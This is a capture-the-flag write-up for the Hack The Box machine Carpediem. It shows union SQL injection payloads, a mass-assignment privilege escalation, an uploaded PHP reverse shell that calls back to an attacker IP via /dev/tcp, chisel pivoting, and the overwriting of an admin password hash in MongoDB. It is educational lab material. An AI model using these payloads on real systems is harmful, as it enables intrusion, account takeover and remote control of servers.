# Carpediem - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img width="560" height="424" src="images/0.png"></div>

Carpediem is a wonderful hard-rated HTB machine with almost a dozen steps. It was created by [TheCyberGeek](https://twitter.com/TheCyberGeek19) and [d4rkpayl0ad](https://app.hackthebox.com/users/168546)

It starts with a SQL injection that hints us at a mass assignment vulnerability. We then use a broken file upload to get a shell.  
The shell is in a container, and we use a statically linked `nmap` to enumerate other containers on the machine.  
One of the containers has MongoDB exposed. We can overwrite the admin's password hash to get access to a Trudesk instance that used this database.  
One of the Trudesk tickets hints us to use Zoiper, a VoIP softphone dialer, to get a new employee's credentials. We can use those credentials to get user on the box.  
On the box, `tcpdump` has elevated privileges allowing us to capture packets on all interfaces. We also have to use an RSA key to decrypt TLS traffic in the capture.  
After decrypting, we'd find some requests with credentials for Backdrop CMS running on another container. We can get RCE with a malicious theme.  
Then, we exploit a cron job to get root on the container.  
Once we have root on the container, we can breakout with CVE-2022-0492.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.11.167
Nmap scan report for 10.10.11.167
Host is up (0.20s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80 -oN carpediem.nmap 10.10.11.167
Nmap scan report for 10.10.11.167
Host is up (0.21s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 96:21:76:f7:2d:c5:f0:4e:e0:a8:df:b4:d9:5e:45:26 (RSA)
|   256 b1:6d:e3:fa:da:10:b9:7b:9e:57:53:5c:5b:b7:60:06 (ECDSA)
|_  256 6a:16:96:d8:05:29:d5:90:bf:6b:2a:09:32:dc:36:4f (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Comming Soon
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

We have the standard SSH and HTTP ports here.  

Visiting the website on port 80:

![1](images/1.png)

It says "Coming Soon: Carpediem.htb", so we can add the domain to `/etc/hosts`:

```text
10.10.11.167 carpediem.htb
```

Since we have the domain name, we can look for subdomains with `gobuster`:

```console
opcode@parrot$ gobuster vhost -u http://carpediem.htb/ -w cybersec/wordlists/subdomains-top1million-110000.txt -q
Found: portal.carpediem.htb (Status: 200) [Size: 31090]
```

We should also add `portal.carpediem.htb` to `/etc/hosts`.  
It is a motorcycle store portal:

![2](images/2.png)

Running `gobuster` in `dir` mode finds a bunch of pages on this subdomain:

```console
opcode@parrot$ gobuster dir -u http://portal.carpediem.htb -x php -w cybersec/wordlists/raft-small-words.txt -q
/admin                (Status: 301) [Size: 328] [--> http://portal.carpediem.htb/admin/]
/login.php            (Status: 200) [Size: 2963]
/plugins              (Status: 301) [Size: 330] [--> http://portal.carpediem.htb/plugins/]
/index.php            (Status: 200) [Size: 31090]
/logout.php           (Status: 302) [Size: 0] [--> ./]
/config.php           (Status: 200) [Size: 0]
/inc                  (Status: 301) [Size: 326] [--> http://portal.carpediem.htb/inc/]
/uploads              (Status: 301) [Size: 330] [--> http://portal.carpediem.htb/uploads/]
/home.php             (Status: 200) [Size: 418]
/assets               (Status: 301) [Size: 329] [--> http://portal.carpediem.htb/assets/]
/about.php            (Status: 200) [Size: 5260]
/classes              (Status: 301) [Size: 330] [--> http://portal.carpediem.htb/classes/]
/libs                 (Status: 301) [Size: 327] [--> http://portal.carpediem.htb/libs/]
/.                    (Status: 200) [Size: 31090]
/registration.php     (Status: 200) [Size: 4564]
/build                (Status: 301) [Size: 328] [--> http://portal.carpediem.htb/build/]
/my_account.php       (Status: 200) [Size: 1704]
/dist                 (Status: 301) [Size: 327] [--> http://portal.carpediem.htb/dist/]
/server-status        (Status: 403) [Size: 285]
/bikes.php            (Status: 200) [Size: 599]
/initialize.php       (Status: 200) [Size: 0]
/edit_account.php     (Status: 200) [Size: 875]
```

`/admin` redirects us to `/admin/login.php`, and it seems to be different from the login page on `/login.php`  
`/config.php` returns a blank page  
`/plugins`, `/inc`, `/uploads`, `/assets`, `/classes`, `/libs`, `/built` and `/dist` all return a 403  
There is a registration page at `/registration.php`, and it is functional  
`/home.php` returns an error which leaks the website's root directory:

```text
Fatal error: Uncaught Error: Call to a member function info() on null in /var/www/html/portal/home.php:5 Stack trace: #0 {main} thrown in /var/www/html/portal/home.php on line 5
```

If we create an account and log in, we'd find that the URLs look like <http://portal.carpediem.htb/?p=home>  
I assumed we have an LFI where `.php` gets appended, but that was not the case.  
Trying to use PHP filters like <http://portal.carpediem.htb/?p=php://filter/convert.base64-encode/resource=edit_account> returns an error.  
Navigating to `/admin` after creating an account throws an `Access Denied!`

## SQL injection

The URLs for bikes on the portal look like <http://portal.carpediem.htb/?p=bikes&s=a87ff679a2f3e71d9181a67b7542122c>  
It is vulnerable to union injection.  
Visiting `http://portal.carpediem.htb/?p=bikes&c=' union select 1,2,3,4,5-- -` displays "2" on the screen.

**Testing for LOAD_FILE**

```text
http://portal.carpediem.htb/?p=bikes&c=' union select 1,load_file('/etc/passwd'),3,4,5-- -
```

It didn't work

**Listing all databases**

```text
http://portal.carpediem.htb/?p=bikes&c=' union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata-- -
```

We get `information_schema,portal`

**Listing all tables in portal**

```text
http://portal.carpediem.htb/?p=bikes&c=' union select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema='portal'-- -
```

We get the tables: `bike_list, brand_list, categories, file_list, rent_list, system_info, users`

We can peek at `file_list`, and `users` tables.  
**Listing all columns in file_list table**

```text
http://portal.carpediem.htb/?p=bikes&c=' union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='file_list'-- -
```

We get `id,file_name,description,status,date_created,date_updated`

**Listing file_name, description and status**

```text
http://portal.carpediem.htb/?p=bikes&c=' union select 1,group_concat(file_name,':',description,':',status),3,4,5 from file_list-- -
```

It returns `Sales_Report.xlsx:Sales Report 2021:Available`  
I tried to access <http://portal.carpediem.htb/uploads/Sales_Report.xlsx>, but it does not exist

**Listing all columns in users table**

```text
http://portal.carpediem.htb/?p=bikes&c=' union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='users'-- -
```

We get `id,firstname,lastname,gender,contact,username,password,address,avatar,last_login,login_type,date_added,date_updated`

**Listing all usernames**

```text
http://portal.carpediem.htb/?p=bikes&c=' union select 1,group_concat(username),3,4,5 from users-- -
```

We get: `admin`, `opcode` (opcode is the account I had created)

**Listing all passwords**

```text
http://portal.carpediem.htb/?p=bikes&c=' union select 1,group_concat(password),3,4,5 from users-- -
```

We get:

```text
b723e511b084ab84b44235d82da572f3
e80b5017098950fc58aad83c8c14978e
```

The latter password is mine, but the admin's password does not crack  
After enumerating more fields, we'd learn that the admin's name is Jeremy Hammond and his email is **jhammond@carpediem.htb**

**Listing all login_types**

```text
http://portal.carpediem.htb/?p=bikes&c=' union select 1,group_concat(login_type),3,4,5 from users-- -
```

We get 1,2

Perhaps changing the login type is the key.  

## Mass Assignment

While updating account details on the <http://portal.carpediem.htb/?p=edit_account> page, we can exploit a mass assignment vulnerability.
The body of POST request being sent looks like the following:

```text
id=25&login_type=2&firstname=opcode&lastname=opcode&contact=opcode&gender=Male&address=opcode&username=opcode&password=
```

We can intercept the request and change `login_type` to `1`

Now, we can access <http://portal.carpediem.htb/admin/>  
It gives us access to admin dashboard.

## File upload

At <http://portal.carpediem.htb/admin/?page=maintenance/files> we have a page for uploading Sales Reports.  
But when we try to upload a file, it warns us and fails.:

```text
NOTE: This has not been fully implemented yet and still in testing!
```

The corresponding request in burp was:

```http
POST /classes/Users.php?f=upload HTTP/1.1
Host: portal.carpediem.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://portal.carpediem.htb
DNT: 1
Connection: close
Referer: http://portal.carpediem.htb/admin/?page=maintenance/files
Cookie: PHPSESSID=ea3ff009390d50b3c4cff050d0142fa8
Content-Length: 0

```

And the response was:

```json
{"error":"multipart\/form-data missing"}
```

We can send it to repeater and fix that.  
Just write a python script for a random file upload and observe it in burp.  
We can then recreate the `multipart/form-data`:

```http
POST /classes/Users.php?f=upload HTTP/1.1
Host: portal.carpediem.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=ea3ff009390d50b3c4cff050d0142fa8
Content-Type: multipart/form-data; boundary=---------------------------424520985210119183231719045284
Content-Length: 100
Origin: http://portal.carpediem.htb
DNT: 1
Connection: close
Referer: http://portal.carpediem.htb/admin/?page=maintenance/files

-----------------------------424520985210119183231719045284
Content-Disposition: form-data; name="rev"; filename="rev.php"
Content-Type: text/x-php

<?php echo 'opcode was here'; ?>
-----------------------------424520985210119183231719045284--

```

Now we get the error:

```json
{"error":"missing 'file_upload' in form-data"}
```

We can take care of that as well. It expects the `name` in `Content-Disposition` to be `file_upload`

```http
POST /classes/Users.php?f=upload HTTP/1.1
Host: portal.carpediem.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=ea3ff009390d50b3c4cff050d0142fa8
Content-Type: multipart/form-data; boundary=---------------------------424520985210119183231719045284
Content-Length: 100
Origin: http://portal.carpediem.htb
DNT: 1
Connection: close
Referer: http://portal.carpediem.htb/admin/?page=maintenance/files

-----------------------------424520985210119183231719045284
Content-Disposition: form-data; name="file_upload"; filename="rev.php"
Content-Type: text/x-php

<?php echo 'opcode was here'; ?>
-----------------------------424520985210119183231719045284--

```

And it worked! The response:

```json
{"success":"uploads\/1656421260_rev.php uploaded"}
```

We can now upload a PHP reverse shell:

```http
POST /classes/Users.php?f=upload HTTP/1.1
Host: portal.carpediem.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=caebac18e431c2d9a61d07aebb46fea2
Content-Type: multipart/form-data; boundary=---------------------------424520985210119183231719045284
Content-Length: 297
Origin: http://portal.carpediem.htb
DNT: 1
Connection: close
Referer: http://portal.carpediem.htb/admin/?page=maintenance/files

-----------------------------424520985210119183231719045284
Content-Disposition: form-data; name="file_upload"; filename="rev.php"
Content-Type: text/x-php

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.44/9001 0>&1'");?>
-----------------------------424520985210119183231719045284--

```

Got the response:

```json
{"success":"uploads\/1656421560_rev.php uploaded"}
```

We can get the curl equivalent for the above command by right-clicking the request and selecting "Copy as curl command":

```console
opcode@parrot$ curl -i -k --compressed -X $'POST' \
    -H $'Host: portal.carpediem.htb' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Type: multipart/form-data; boundary=---------------------------424520985210119183231719045284' -H $'Content-Length: 299' -H $'Origin: http://portal.carpediem.htb' -H $'DNT: 1' -H $'Connection: close' -H $'Referer: http://portal.carpediem.htb/admin/?page=maintenance/files' \
    -b $'PHPSESSID=caebac18e431c2d9a61d07aebb46fea2' \
    --data-binary $'-----------------------------424520985210119183231719045284\x0d\x0aContent-Disposition: form-data; name=\"file_upload\"; filename=\"rev.php\"\x0d\x0aContent-Type: text/x-php\x0d\x0a\x0d\x0a<?php exec(\"/bin/bash -c \'bash -i >& /dev/tcp/10.10.14.44/9001 0>&1\'\");?>\x0d\x0a-----------------------------424520985210119183231719045284--\x0d\x0a' \
    $'http://portal.carpediem.htb/classes/Users.php?f=upload'
```

Visiting <http://portal.carpediem.htb/uploads/1656421560_rev.php> in the browser gets us a shell as `www-data`

Upgrade the shell with:

```console
www-data@3c371615b7aa:/tmp$ python3 -c 'import pty;pty.spawn("/bin/bash");'
^Z
opcode@parrot$ stty raw -echo; fg
www-data@3c371615b7aa:/tmp$ export TERM=xterm-256color
www-data@3c371615b7aa:/tmp$ exec /bin/bash
```

The terminal looks like the following:

```console
www-data@3c371615b7aa:/var/www/html/portal$ 
```

We are likely inside a docker container.

## Password harvesting

In `/var/www/html/portal/initialize.php`, I found a password and a hash:

``` php
<?php
$dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');
if(!defined('base_url')) define('base_url','http://portal.carpediem.htb/');
if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
if(!defined('dev_data')) define('dev_data',$dev_data);
if(!defined('DB_SERVER')) define('DB_SERVER',"mysql");
if(!defined('DB_USERNAME')) define('DB_USERNAME',"portaldb");
if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"J5tnqsXpyzkK4XNt");
if(!defined('DB_NAME')) define('DB_NAME',"portal");
?>
```

The hash could not be cracked, and I could not find any password reuse.  
Accessing the database would not be helpful either.  

Instead, we can do some docker enumeration.

## Enumerating docker host from a container

By default (on Linux), Docker sets up a bridge network, and standalone containers bind directly to the Docker host’s network. There is no network isolation at all. In other words, we can connect to a container's network from the docker host or any other container. Similarly, we can connect to the host's network from any container.  
We can use this configuration to our advantage and enumerate other containers and the network on the host and other containers.  

For that, I transferred a statically linked `nmap` binary (<https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap>) to the box.  
We can use CIDR notation with nmap as well:

```console
www-data@3c371615b7aa:/tmp$ chmod +x nmap 
www-data@3c371615b7aa:/tmp$ ./nmap -p- 172.17.0.1/29
Nmap scan report for 172.17.0.1
Host is up (0.000086s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap scan report for 172.17.0.2
Host is up (0.00019s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
80/tcp  open  http
443/tcp open  https

Nmap scan report for 172.17.0.3
Host is up (0.00027s latency).
Not shown: 65534 closed ports
PORT      STATE SERVICE
27017/tcp open  unknown

Nmap scan report for mysql (172.17.0.4)
Host is up (0.00033s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE
3306/tcp  open  mysql
33060/tcp open  unknown

Nmap scan report for 172.17.0.5
Host is up (0.00015s latency).
Not shown: 65534 closed ports
PORT     STATE SERVICE
8118/tcp open  unknown

Nmap scan report for 3c371615b7aa (172.17.0.6)
Host is up (0.000087s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE
80/tcp open  http
```

Using `curl`, I found that 172.17.0.1 (docker host) is the "Coming Soon" page.  
Port 80 on 172.17.0.2 is the default apache page, but port 443 is a new service.

## Port forwarding with `chisel`

Next, we can upload `chisel` binary (<https://github.com/jpillora/chisel>) to the box and forward them to local system.  
On the attacker VM, we can run:

```console
opcode@parrot$ ./chisel server -p 9999 --socks5 --reverse -v
```

And on the box,

```console
www-data@3c371615b7aa:/tmp$ ./chisel client 10.10.14.44:9999 R:socks
```

Since the server is running with `-v`, we would see `proxy#R:127.0.0.1:1080=>socks: Listening` once a connection is made.  
We need to edit `/etc/proxychains.conf` and add this line:

```text
socks5 127.0.0.1 1080
```

## `mysql` on 172.17.0.4

172.17.0.4 has the `mysql` port 3306 open, and we can start there.  
We already have the credentials:

```text
portaldb:J5tnqsXpyzkK4XNt
```

```console
opcode@parrot$ proxychains mysql -u portaldb -h 172.17.0.4 -p
Enter password: J5tnqsXpyzkK4XNt
```

```console
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| portal             |
+--------------------+
```

It is the same database we could access through the SQLi; there is nothing new here.

```console
mysql> show grants\G
*************************** 1. row ***************************
Grants for portaldb@%: GRANT USAGE ON *.* TO `portaldb`@`%`
*************************** 2. row ***************************
Grants for portaldb@%: GRANT ALL PRIVILEGES ON `portal`.* TO `portaldb`@`%`
```

We don't have any special privileges either.

Also, on the container:

```console
www-data@3c371615b7aa:/tmp$ printenv
MYSQL_PORT_33060_TCP_ADDR=172.17.0.4
MYSQL_PORT=tcp://172.17.0.4:3306
MYSQL_PORT_3306_TCP_ADDR=172.17.0.4
MYSQL_NAME=/portal/mysql
MYSQL_ENV_MYSQL_ROOT_PASSWORD=3dQXeqjMHnq4kqDv
MYSQL_PORT_3306_TCP_PORT=3306
[--SNIP--]
```

There we have the password for `mysql` root. We can try using it:

```console
opcode@parrot$ proxychains mysql -u root -h 172.17.0.4 -p
Enter password: 3dQXeqjMHnq4kqDv
```

```console
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| portal             |
| sys                |
+--------------------+
```

No new non-default database, but we do have lots of privileges:

```console
mysql> show grants\G
*************************** 1. row ***************************
Grants for root@%: GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, RELOAD, SHUTDOWN, PROCESS, FILE, REFERENCES, INDEX, ALTER, SHOW DATABASES, SUPER, CREATE TEMPORARY TABLES, LOCK TABLES, EXECUTE, REPLICATION SLAVE, REPLICATION CLIENT, CREATE VIEW, SHOW VIEW, CREATE ROUTINE, ALTER ROUTINE, CREATE USER, EVENT, TRIGGER, CREATE TABLESPACE, CREATE ROLE, DROP ROLE ON *.* TO `root`@`%` WITH GRANT OPTION
*************************** 2. row ***************************
Grants for root@%: GRANT APPLICATION_PASSWORD_ADMIN,AUDIT_ADMIN,AUTHENTICATION_POLICY_ADMIN,BACKUP_ADMIN,BINLOG_ADMIN,BINLOG_ENCRYPTION_ADMIN,CLONE_ADMIN,CONNECTION_ADMIN,ENCRYPTION_KEY_ADMIN,FLUSH_OPTIMIZER_COSTS,FLUSH_STATUS,FLUSH_TABLES,FLUSH_USER_RESOURCES,GROUP_REPLICATION_ADMIN,GROUP_REPLICATION_STREAM,INNODB_REDO_LOG_ARCHIVE,INNODB_REDO_LOG_ENABLE,PASSWORDLESS_USER_ADMIN,PERSIST_RO_VARIABLES_ADMIN,REPLICATION_APPLIER,REPLICATION_SLAVE_ADMIN,RESOURCE_GROUP_ADMIN,RESOURCE_GROUP_USER,ROLE_ADMIN,SERVICE_CONNECTION_ADMIN,SESSION_VARIABLES_ADMIN,SET_USER_ID,SHOW_ROUTINE,SYSTEM_USER,SYSTEM_VARIABLES_ADMIN,TABLE_ENCRYPTION_ADMIN,XA_RECOVER_ADMIN ON *.* TO `root`@`%` WITH GRANT OPTION
```

But for some reason, I was not able to get anything:

```console
mysql> select LOAD_FILE('/etc/hosts');
+--------------------------------------------------+
| LOAD_FILE('/etc/hosts')                          |
+--------------------------------------------------+
| NULL                                             |
+--------------------------------------------------+
```

Maybe it is not meant to be used directly.

## `ftp` and `backdrop` on 172.17.0.2

```console
opcode@parrot$ proxychains ftp 172.17.0.2
Connected to 172.17.0.2.
220 (vsFTPd 3.0.3)
Name (172.17.0.2:opcode): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
```

Anonymous login is enabled, but I soon ran into errors:

```console
ftp> ls
500 Illegal PORT command.
ftp: bind: Address already in use
```

A StackOverflow answer mentions using "passive" mode to get around this issue:

```console
ftp> pass
Passive mode on.
ftp> dir
227 Entering Passive Mode (172,17,0,2,24,2).
150 Here comes the directory listing.
```

And it got stuck eternally. This answer mentions that `ftp` needs port 20 as well:  
<https://unix.stackexchange.com/questions/251486/why-doesnt-ftp-work-through-my-ssh-tunnel>

I also tried using a statically linked `busybox` binary, but it failed too:

```console
www-data@3c371615b7aa:/tmp$ ./busybox ftpget -v -u anonymous -p anonymous 172.17.0.2 /etc/passwd
Connecting to 172.17.0.2 (172.17.0.2:21)
ftpget: cmd (null) (null)
ftpget: cmd USER anonymous
ftpget: cmd PASS anonymous
ftpget: cmd TYPE I (null)
ftpget: cmd EPSV (null)
ftpget: cmd SIZE /etc/passwd
ftpget: cmd RETR /etc/passwd
ftpget: unexpected server response to RETR: 550 Failed to open file.
```

Moving on to ports 80 and 443:

```console
opcode@parrot$ proxychains firefox 172.17.0.2
```

It opens up a default apache page.

```console
opcode@parrot$ proxychains firefox https://172.17.0.2
```

But this one opens a new page:

![3](images/3.png)

Using the password reset feature, I tried to enumerate the usernames obtained so far (jhammond, jeremy, admin); nothing worked.

## `trudesk` on 172.17.0.5

```console
opcode@parrot$ proxychains firefox http://172.17.0.5:8118
```

It loads after a while, but we do not have the credentials:

![4](images/4.png)

The version is considerably old (v1.1.11) and has a bunch of CVEs, but they all need to be authenticated.  
They don't guarantee RCE, either.

## `mongodb` on 172.17.0.3

Port 27017 is open on container 172.17.0.3

```console
opcode@parrot$ proxychains curl 172.17.0.3:27017                    
ProxyChains-3.1 (http://proxychains.sf.net)
It looks like you are trying to access MongoDB over HTTP on the native driver port.
```

Similar to the box **Talkative**, we can download `mongosh` (<https://www.mongodb.com/try/download/shell>) to interact with it.  
I like the standalone binary, hence I selected "Linux Tarball 64-bit" as "Platform"

```console
opcode@parrot$ proxychains ./mongosh --host 172.17.0.3 --port 27017
```

```console
test> show databases
admin    132.00 KiB
config    72.00 KiB
local     88.00 KiB
trudesk    1.07 MiB
```

`trudesk` is the database of interest:

```console
test> use trudesk
switched to db trudesk
trudesk> show collections
accounts
counters
departments
groups
messages
notifications
priorities
role_order
roles
sessions
settings
tags
teams
templates
tickets
tickettypes
```

`accounts` is the collection of interest:

```console
test> db.accounts.find().pretty()
```

```js
[
  {
    _id: ObjectId("623c8b20855cc5001a8ba13c"),
    preferences: {
      tourCompleted: false,
      autoRefreshTicketGrid: true,
      openChatWindows: []
    },
    hasL2Auth: false,
    deleted: false,
    username: 'admin',
    password: '$2b$10$imwoLPu0Au8LjNr08GXGy.xk/Exyr9PhKYk1lC/sKAfMFd5i3HrmS',
    fullname: 'Robert Frost',
    email: 'rfrost@carpediem.htb',
    role: ObjectId("623c8b20855cc5001a8ba138"),
    title: 'Sr. Network Engineer',
    accessToken: '22e56ec0b94db029b07365d520213ef6f5d3d2d9',
    __v: 0,
    lastOnline: ISODate("2022-04-07T20:30:32.198Z")
  },
  {
    _id: ObjectId("6243c0be1e0d4d001b0740d4"),
    preferences: {
      tourCompleted: false,
      autoRefreshTicketGrid: true,
      openChatWindows: []
    },
    hasL2Auth: false,
    deleted: false,
    username: 'jhammond',
    email: 'jhammond@carpediem.htb',
    password: '$2b$10$n4yEOTLGA0SuQ.o0CbFbsex3pu2wYr924cKDaZgLKFH81Wbq7d9Pq',
    fullname: 'Jeremy Hammond',
    title: 'Sr. Systems Engineer',
    role: ObjectId("623c8b20855cc5001a8ba139"),
    accessToken: 'a0833d9a06187dfd00d553bd235dfe83e957fd98',
    __v: 0,
    lastOnline: ISODate("2022-04-01T23:36:55.940Z")
  },
  {
    _id: ObjectId("6243c28f1e0d4d001b0740d6"),
    preferences: {
      tourCompleted: false,
      autoRefreshTicketGrid: true,
      openChatWindows: []
    },
    hasL2Auth: false,
    deleted: false,
    username: 'jpardella',
    email: 'jpardella@carpediem.htb',
    password: '$2b$10$nNoQGPes116eTUUl/3C8keEwZAeCfHCmX1t.yA1X3944WB2F.z2GK',
    fullname: 'Joey Pardella',
    title: 'Desktop Support',
    role: ObjectId("623c8b20855cc5001a8ba139"),
    accessToken: '7c0335559073138d82b64ed7b6c3efae427ece85',
    __v: 0,
    lastOnline: ISODate("2022-04-07T20:33:20.918Z")
  },
  {
    _id: ObjectId("6243c3471e0d4d001b0740d7"),
    preferences: {
      tourCompleted: false,
      autoRefreshTicketGrid: true,
      openChatWindows: []
    },
    hasL2Auth: false,
    deleted: false,
    username: 'acooke',
    email: 'acooke@carpediem.htb',
    password: '$2b$10$qZ64GjhVYetulM.dqt73zOV8IjlKYKtM/NjKPS1PB0rUcBMkKq0s.',
    fullname: 'Adeanna Cooke',
    title: 'Director - Human Resources',
    role: ObjectId("623c8b20855cc5001a8ba139"),
    accessToken: '9c7ace307a78322f1c09d62aae3815528c3b7547',
    __v: 0,
    lastOnline: ISODate("2022-03-30T14:21:15.212Z")
  },
  {
    _id: ObjectId("6243c69d1acd1559cdb4019b"),
    preferences: {
      tourCompleted: false,
      autoRefreshTicketGrid: true,
      openChatWindows: []
    },
    hasL2Auth: false,
    deleted: false,
    username: 'svc-portal-tickets',
    email: 'tickets@carpediem.htb',
    password: '$2b$10$CSRmXjH/psp9DdPmVjEYLOUEkgD7x8ax1S1yks4CTrbV6bfgBFXqW',
    fullname: 'Portal Tickets',
    title: '',
    role: ObjectId("623c8b20855cc5001a8ba13a"),
    accessToken: 'f8691bd2d8d613ec89337b5cd5a98554f8fffcc4',
    __v: 0,
    lastOnline: ISODate("2022-03-30T13:50:02.824Z")
  }
]
```

All those passwords are hashed with `bcrypt` and certainly not meant to be cracked.  
But just like the box **Talkative**, we can overwrite one of those passwords with our own and get access.  
I created a little python script to generate `bcrypt` passwords:

```py
from bcrypt import gensalt, hashpw
from sys import argv


def gen_bcrypt_hash(password):
    password = password.encode()
    salt = gensalt(rounds=10, prefix=b'2b')
    return hashpw(password, salt)

if __name__ == "__main__":
    if len(argv) == 2:
        hashed = gen_bcrypt_hash(argv[1])
    elif len(argv) ==1:
        hashed = gen_bcrypt_hash('opcode')
    print(hashed.decode())
```

We can use it to generate a password:

```console
opcode@parrot$ python3 gen_bcrypt.py   
$2b$10$sFCayE1G57f/ldvR2t.zR.xj7eSmXM1SSGsyWQ2JMN1ObeGBySPy6
```

Robert Frost is the admin; we can update his password:

```console
test> db.accounts.update({ "_id" : ObjectId("623c8b20855cc5001a8ba13c") }, { $set: {"password": "$2b$10$sFCayE1G57f/ldvR2t.zR.xj7eSmXM1SSGsyWQ2JMN1ObeGBySPy6" } })
DeprecationWarning: Collection.update() is deprecated. Use updateOne, updateMany, or bulkWrite.
{
  acknowledged: true,
  insertedId: null,
  matchedCount: 1,
  modifiedCount: 1,
  upsertedCount: 0
}
```

Now, `admin:opcode` should work for the Trudesk login.

## Trudesk tickets

Trudesk is an open-source help desk/ticketing solution.  
After logging in with `admin:opcode`, we can find a bunch of tickets:

![5](images/5.png)

We can see what each one is about:

![6](images/6.png)

They are likely talking about the backdrop CMS we found earlier.

![7](images/7.png)

Trudesk integration with the portal? Interesting

![8](images/8.png)

This one refers to the mass assignment vulnerability we exploited earlier.

![9](images/9.png)

It means that if we can access his voicemail, we should be able to get his password.  
Horace Flaccus is not an account on Trudesk, so the password is for something else.

I could only access the pages directory while working on the write-up.  
The Trudesk page was too slow to load when I initially did the box. So I had to rely on the API to get the same information (<https://docs.trudesk.io/v1/api/>)

```console
opcode@parrot$ proxychains curl -s -X POST 172.17.0.5:8118/api/v1/login -d "username=admin&password=opcode" | sed -n '2,$p' | jq .
|S-chain|-<>-127.0.0.1:1080-<><>-172.17.0.5:8118-<><>-OK
{
  "success": true,
  "accessToken": "22e56ec0b94db029b07365d520213ef6f5d3d2d9",
  "user": {
    "hasL2Auth": false,
    "deleted": false,
    "_id": "623c8b20855cc5001a8ba13c",
    "username": "admin",
    "fullname": "Robert Frost",
    "email": "rfrost@carpediem.htb",
    "role": {
      "_id": "623c8b20855cc5001a8ba138",
      "name": "Admin",
      "description": "Default role for admins",
      "normalized": "admin",
      "isAdmin": true,
      "isAgent": true,
      "id": "623c8b20855cc5001a8ba138"
    },
    "title": "Sr. Network Engineer",
    "accessToken": "22e56ec0b94db029b07365d520213ef6f5d3d2d9",
    "lastOnline": "2022-12-01T17:47:49.648Z"
  }
}
```

It gives us the `accessToken`: `22e56ec0b94db029b07365d520213ef6f5d3d2d9`

```console
opcode@parrot$ proxychains curl -H "accesstoken: 22e56ec0b94db029b07365d520213ef6f5d3d2d9" -s 172.17.0.5:8118/api/v1/tickets | sed -n '2,$p' | jq '.[] | .issue'
|S-chain|-<>-127.0.0.1:1080-<><>-172.17.0.5:8118-<><>-OK
"<p>Hey Jeremy, <br />Can you help me work on the CMS at all this week?  The base install is completed, but I need your expertise to make sure I did everything correctly.</p>\n"
"<p>I&#39;ll be looking into tightenting up security permissions this week for the Trudesk integration in the Portal.  We&#39;ll need to also perform some threat modeling to find out where our weak points are and come up with an action plan to mitigate.</p>\n"
"<p>We have hired a new Network Engineer and need to get him set up with his credentials and phone before his start date next month.<br />Please create this account at your earliest convenience.<br /><br />Thank you.</p>\n"
"<p>I need a handle, man.  I mean, I don&#39;t have an identity until I have a handle.<br />How about The Master of Disaster?</p>\n"
"<p>We need to patch the user profile and admin sections of our Portal ASAP. Why are we continually pushing out functions that haven&#39;t been tested by the Infosec team?</p>\n"
```

```console
opcode@parrot$ proxychains curl -H "accesstoken: 22e56ec0b94db029b07365d520213ef6f5d3d2d9" -s 172.17.0.5:8118/api/v1/tickets | sed -n '2,$p' | jq '.[] | .comments | .[].comment'
|S-chain|-<>-127.0.0.1:1080-<><>-172.17.0.5:8118-<><>-OK
"<p>Please don&#39;t expose that application publically.  I told you I would help when I had time and right now I&#39;m just too busy.<br>Build it out if you&#39;d like, but...just don&#39;t do anything stupid.</p>\n"
"<p>Don&#39;t worry. I moved it off of the main server and into a container with SSL encryption.</p>\n"
